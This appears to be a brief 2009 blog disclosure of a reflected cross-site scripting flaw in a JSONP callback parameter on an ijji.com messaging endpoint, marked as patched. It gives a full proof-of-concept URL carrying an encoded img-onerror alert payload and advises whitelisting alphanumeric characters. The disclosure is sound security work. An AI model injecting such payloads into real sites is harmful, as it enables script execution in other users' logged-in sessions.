JSON Buddy Callback

19 July 2009

Type: Non-persistent
Criteria: Logged in

http://message.ijji.com/buddy.nhn?m=countBuddyJSON&format=jsonp&callback=%3Cimg%20src=x%20onerror=%22alert(%27xss%27);%22%20/%3E%3C!--

The variable callback should whitelist an array of characters allowed. In the case of a JSON callback function, A-Z, a-z and 0-9 would be fine.

Advertisement

This entry was posted on 19 July 2009 at 12:00 pm and is filed under patched, x1nixmzeng.

Follow

Get every new post delivered to your Inbox.